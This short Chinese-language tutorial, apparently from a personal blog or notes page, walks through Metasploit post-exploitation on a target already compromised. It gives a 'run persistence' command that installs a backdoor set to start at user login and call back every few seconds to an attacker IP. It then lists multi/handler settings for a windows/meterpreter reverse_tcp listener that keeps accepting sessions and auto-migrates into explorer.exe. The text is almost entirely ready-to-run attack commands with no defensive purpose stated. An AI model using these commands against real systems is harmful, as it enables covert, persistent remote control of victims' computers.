• 在与目标设备的meterpreter会话中创建一个持久后门(此后门将重新生成一个木马文件,并且该文件将周期性向服务端发送TCP请求)

  • 方法:

    1
    run persistence -U -i 5 -p 123 -r 192.168.43.75
    1
    2
    3
    4
    -U 用户登录时自动启动该木马
    -i 每次连接尝试之间的时间间隔(秒)
    -p 运行Metasploit的系统正在侦听的端口
    -r 运行Metasploit监听连接的系统的IP

此时就可以放心的断开与目标设备的session了,目标设备将周期性的向本机发送TCP请求,下次想连接此设备时只需做以下操作:

1
2
3
4
5
6
use exploit/multi/handler   
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.43.75
set exitonsession false (这个如果不设置为false的话,只要建立了一个session后就不再继续监听,想要再连接其他session需要再次run。反之,如果设为false,建立了一个session后还会继续监听,无需run即可建立多个session。)
set AutoRunScript migrate -N explorer.exe
run